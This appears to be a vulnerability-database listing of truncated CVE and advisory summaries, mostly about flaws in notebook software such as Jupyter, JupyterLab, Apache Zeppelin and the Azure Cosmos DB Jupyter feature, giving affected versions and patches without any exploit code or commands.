CVE-2021-3786

CVE-2021-3786 concerns Lenovo notebook/ThinkPad systems with a vulnerable SMI callback in the CSME configuration. The issue is a potential flaw in the SMI callback function that could allow leaking data from the SMRAM range. Public records describe this as a data leakage risk affecting confidenti...

UBUNTU-CVE-2021-39906

Improper validation of ipynb files in GitLab CE/EE version 13.5 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf...

PT-2021-22753 · Gitlab · Gitlab Ce/Ee +1

Name of the Vulnerable Software and Affected Versions: GitLab CE/EE versions 13.5 and above Description: The issue arises from improper validation of ipynb files, allowing an attacker to execute arbitrary JavaScript code on the victim's behalf. This enables the attacker to perform actions as the...

PeTeReport - An Open-Source Application Vulnerability Reporting Tool

PeTeReport Pe nTe st Report is an open-source application vulnerability reporting tool designed to assist pentesting/redteaming efforts, by simplifying the task of writting and generation of reports. Focused in product security, the tool help security researchers and pentesters to provide detaile...

CVE-2021-41171

eLabFTW is an open source electronic lab notebook manager for research teams. In versions of eLabFTW before 4.1.0, it allows attackers to bypass a brute-force protection mechanism by using many different forged PHPSESSID values in HTTP Cookie header. This issue has been addressed by implementing...

CVE-2021-41171

CVE-2021-41171 affects eLabFTW prior to 4.1.0. The issue allows bypassing brute-force protection by using forged PHPSESSID values in the HTTP Cookie header, enabling login bypass as described in multiple sources. Remediation is to upgrade to version 4.1.0 (upstream rate limiting is a valid option...

PT-2021-6962 · Microsoft · Visual Studio Code

Name of the Vulnerable Software and Affected Versions: Visual Studio Code affected versions not specified Description: The issue is related to errors in the representation of information by the user interface, which can allow an attacker to conduct spoofing attacks. There is also a mention of a...

Apache Zeppelin Authentication Bypass Vulnerability

Apache Zeppelin is a Web-based open source notebook application from the Apache Foundation that supports interactive data analysis and collaborative documentation. The program supports interactive data analysis and collaborative documentation. Apache Zeppelin 0.9.0 and earlier versions contain a...

Apache Zeppelin Cross-Site Scripting Vulnerability

Apache Zeppelin is a web-based open source notebook application from the Apache Foundation that supports interactive data analysis and collaborative documentation. An xss vulnerability exists. An attacker could exploit this vulnerability to inject malicious scripts...

CVE-2020-13929 Notebook permissions bypass

Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions...

Update on the vulnerability in the Azure Cosmos DB Jupyter Notebook Feature

On August 12, 2021, a security researcher reported a vulnerability in the Azure Cosmos DB Jupyter Notebook feature that could potentially allow a user to gain access to another customers resources by using the accounts primary read-write key. We mitigated the vulnerability immediately. Our...

Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers

Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization. The flaw, which grants...

Update on the vulnerability in the Azure Cosmos DB Jupyter Notebook Feature

On August 12, 2021, a security researcher reported a vulnerability in the Azure Cosmos DB Jupyter Notebook feature that could potentially allow a user to gain access to another customers resources by using the accounts primary read-write key. We mitigated the vulnerability immediately. Our...

Update on the vulnerability in the Azure Cosmos DB Jupyter Notebook Feature

On August 12, 2021, a security researcher reported a vulnerability in the Azure Cosmos DB Jupyter Notebook feature that could potentially allow a user to gain access to another customer's resources by using the account's primary read-write key. We mitigated the vulnerability immediately. Our...

GHSA-HWVQ-6GJX-J797 Special Element Injection in notebook

Impact Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook. Patches 5.7.11, 6.4.1 References OWASP Page on Injection Prevention For more information If you have any questions or comments about this advisory, or vulnerabilities ...

fairing (>=0.0.2 <=0.0.3), hugo-jupyter (>=0.2.1 <=0.3.0) +7 more potentially affected by CVE-2021-32798 via notebook (>=4.2.3 <=5.7.10)

notebook PYPI version =4.2.3, =0.0.2, =0.2.1, =0.1.2, =0.5.0, =1.0.0, =0.1.0, =0.2.0.dev1 Source cves: CVE-2021-32798 Source advisory: OSV:GHSA-HWVQ-6GJX-J797...

3deecelltracker (=1.0.0), abracadabra (>=0.0.0 <=0.0.7) +64 more potentially affected by CVE-2021-32798 via notebook (>=6.0.0 <=6.4.0)

notebook PYPI version =6.0.0, =0.0.0, =1.0.0, =1.0.1, =1.0.1, =0.0.2a0, =1.0.0, =0.3.4, =0.1.0rc1, =0.0.1, =0.0.4, =1.0.2rc8, =2.1.0rc4 and more Source cves: CVE-2021-32798 Source advisory: OSV:GHSA-HWVQ-6GJX-J797...

fairing (>=0.0.2 <=0.0.3), hugo-jupyter (>=0.2.1 <=0.3.0) +7 more potentially affected by CVE-2021-32797 via notebook (>=4.2.3 <=5.7.10)

notebook PYPI version =4.2.3, =0.0.2, =0.2.1, =0.1.2, =0.5.0, =1.0.0, =0.1.0, =0.2.0.dev1 Source cves: CVE-2021-32797 Source advisory: OSV:GHSA-4952-P58Q-6CRX...

3deecelltracker (=1.0.0), abracadabra (>=0.0.0 <=0.0.7) +64 more potentially affected by CVE-2021-32797 via notebook (>=6.0.0 <=6.4.0)

notebook PYPI version =6.0.0, =0.0.0, =1.0.0, =1.0.1, =1.0.1, =0.0.2a0, =1.0.0, =0.3.4, =0.1.0rc1, =0.0.1, =0.0.4, =1.0.2rc8, =2.1.0rc4 and more Source cves: CVE-2021-32797 Source advisory: OSV:GHSA-4952-P58Q-6CRX...

GHSA-4952-P58Q-6CRX JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>

Impact Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook. Patches Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21. References OWASP Page on Restricting Form Submissions For more information If you have...